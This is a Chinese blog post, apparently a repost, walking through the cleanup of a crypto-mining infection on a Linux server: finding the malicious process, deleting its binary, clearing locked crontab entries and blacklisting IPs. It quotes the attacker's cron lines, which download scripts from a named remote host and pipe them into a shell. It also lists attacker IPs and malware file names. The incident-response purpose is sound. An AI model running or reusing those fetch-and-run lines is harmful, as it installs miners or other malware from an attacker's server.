清除 挖矿脚本 攻击

清除 挖矿脚本 攻击清除挖矿脚本攻击 1 查看系统进程 是否有异常 top 发现 CPU 占用率 200 判定服务器已经被植入木马 2 查看异常进程是哪一个程序造成的 ls al proc 14618 发现恶意程序 绿色的是可执行文件 etc lafy3 删除恶意程序 cd etcrm rflzfy4 发现过了一会 lzfy 恶意程序再次出现 怀疑是个定时任务查看定时任

清除 挖矿脚本 攻击

1.查看系统进程,是否有异常: top

清除 挖矿脚本 攻击

发现CPU占用率200%,判定服务器已经被植入木马

2.查看异常进程是哪一个程序造成的 ls -al /proc/14618

清除 挖矿脚本 攻击

发现恶意程序(绿色的是可执行文件)/etc/lafy

3.删除恶意程序

cd  /etc

rm -rf lzfy

4.发现过了一会,lzfy恶意程序再次出现,怀疑是个定时任务

查看定时任务 crontab -l

发现有3个下载的可疑行为,下载木马脚本

清除 挖矿脚本 攻击

清除 挖矿脚本 攻击

一共发现3个可疑的攻击脚本的网络地址

*/13 * * * * url -fsSL http://w.3ei.xyz:43768/lll.sh | sh

*/2 * * * * wget -O .cmd http://w.3ei.xyz:43768/lll.sh && bash .cmd

*/12 * * * * curl -fsSL http://w.3ei.xyz:43768/crontab.sh | sh

先杀死程序 kill -9 14618

清除定时任务 crontab -e

如果定时任务不能删除可能是文件属性+i操作

cd var/spool/cron

chattr -ia cron

删除root用户的定时任务

rm -rf root

再次删除恶意程序

cd  /etc

rm -rf lzfy

 

5.清除临时目录其他可疑文件

cd tmp

ll

清除 挖矿脚本 攻击

 

6.查看可疑的网络连接

lsof -i

清除 挖矿脚本 攻击

lsof -c lzfy

清除 挖矿脚本 攻击

7.追踪攻击者IP

ping 域名获取攻击者IP地址

打开cmd

ping w.3ei.xyz

清除 挖矿脚本 攻击

获得IP地址为220.194.237.43

8.最后拿到的可疑IP地址列表

47.101.30.124

218.28.144.38

140.143.35.89

将上述IP列表加入黑名单即可。

9.附件:从服务器上查看近期上传的可疑文件

  清除 挖矿脚本 攻击

10.最终获得所有黑客攻击的文件,

3个shell脚本

crontab.sh,lll.sh,update.sh

3个exe攻击程序副本

bajx,lzfy,pvds

1个js挖矿脚本

3个试探攻击文件

rzx,systemctI,yums

清除 挖矿脚本 攻击

 

(撒花)晒尸体

黑客hello网站地址:

http://w.3ei.xyz:43768/

 

清除 挖矿脚本 攻击

 

 

 

作者:xzlAwin

日期:2019.04.24

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/216624.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月18日 上午11:26
下一篇 2026年3月18日 上午11:27


相关推荐

  • Pycharm 配置git(图文讲解)

    Pycharm 配置git(图文讲解)说明 本文针对的是电脑中已经安装过 git pycharm 的用户工具准备 gitpycharm 一双慧眼和一双勤劳的双手配置 git 打开 pycharm gt File Default gt Setting gt VersionContr gt Gitvcs gt checkoutfrom

    2026年3月27日
    2
  • CMS垃圾收集器详解

    CMS垃圾收集器详解概述 CMS 垃圾收集器是一款优秀的老年代并发垃圾收集器 通过与用户线程并发执行的方式减少 GC 停顿的时间 本文主要聊一下 CMS 设计到的相关的数据结构 具体的执行过程 运行中会出现的异常情况 在 CMS 之前并行垃圾收集器通过下图方式进行 虽然 GC 阶段多线程并行执行单此时用户线程是完全暂停的 如果 GC 时间过长 将引发服务响应超时 调用接口超时等各类异常 而 CMS 垃圾收集器大部分时间 GC 线程与用户线程并发执行 只有在初始标记和重新标记阶段才暂停用户线程总体思路 当达到 GC 条件时 开始并发标记存

    2026年3月18日
    2
  • 微信小程序组件化开发

    微信小程序组件化开发小程序组件化开发根据组件传值的不同决定显示效果 减少了代码的耦合 有效对代码进行了复用

    2026年3月17日
    2
  • Git的安装与使用教程(超详细!!!)「建议收藏」

    Git的安装与使用教程(超详细!!!)「建议收藏」git提交全部文件1、get.add.gitaddxx命令可以将xx文件添加到暂存区,如果有很多改动可以通过getadd-A.来一次添加所有改变的文件。注意-A选项后面还有一个句点。gitadd-A表示添加所有内容,gitadd.表示添加新文件和编辑过的文件不包括删除的文件;gitadd-u表示添加编辑或者删除的文件,不包括新添加的文件。2.、git…

    2022年4月29日
    47
  • 智谱GLM-4.6开源:国产大模型FP8混合精度部署加速落地,赋能AI生态

    智谱GLM-4.6开源:国产大模型FP8混合精度部署加速落地,赋能AI生态

    2026年3月12日
    1
  • 基于AX88796B的网络接口模块的设计与实现[通俗易懂]

    基于AX88796B的网络接口模块的设计与实现[通俗易懂] 基于AX88796B的网络接口模块的设计与实现[日期:2008-7-22]来源:今日电子/21IC 作者:重庆邮电大学崔巍[字体:大中小]  引言网络技术应用日益普及的今天,工业现场的仪器仪表、数据采集和控制设备也日趋网络化,工业自动化和网络的结合越来越密切。而将以太网和嵌入式系统相结合应用于工业控制中已成为趋势。AX8

    2022年6月10日
    34

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号